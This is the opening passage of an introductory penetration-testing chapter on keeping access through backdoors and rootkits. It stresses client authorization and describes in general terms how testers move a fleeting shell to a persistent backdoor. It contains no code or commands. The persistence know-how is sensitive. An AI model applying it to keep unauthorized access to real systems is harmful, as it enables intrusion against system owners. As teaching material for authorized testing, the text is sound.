Introduction to pentesting: Maintaining Access with Backdoors and Rootkits

Introduction

Maintaining access to a remote system is questionable activity and that needs to be discussed and clearly explained to the client. Many companies are interested in having a penetration test performed but are leery of allowing the penetration testing company to make use of backdoors. Most people are afraid that these backdoors will be discovered and exploited by an unauthorized third party. Imagine that you are the CEO of a company, how well would you sleep knowing that you may have an open, backdoor channel into your network? Remember, the client sets both the scope and the authorization of the penetration test. You’ll need to take the time to fully cover and discuss this step before proceeding.

Still, on occasion you may be asked to conduct a penetration test that does require the use of a backdoor. Whether the reason is to provide a proof-of-concept, or simply to create a realistic scenario where the attacker can return to the target, it’s important to cover the basics in this step.

In the simplest scene, a backdoor is a piece of software that resides on the target computer and allows the attack to return (connect) to the machine at any time. In most cases, the backdoor is a hidden process that runs on the target machine and allows a normally unauthorized user to control the PC.

It is also important to understand that many exploits are fleeting. They work and provide access only as long as the program that was exploited remains running. In many cases, if the target machine reboots or the exploited process is stopped, the shell will be lost. As a result of this, one of the first tasks to complete upon gaining access to a system is to migrate your shell to a more permanent home. This is often done through the use of backdoors.

Later in the chapter, we’ll discuss rootkits. Rootkits are a special kind of software that embed themselves deep into the operating systems and perform a number of tasks, including giving a hacker the ability to complete hide processes and programs.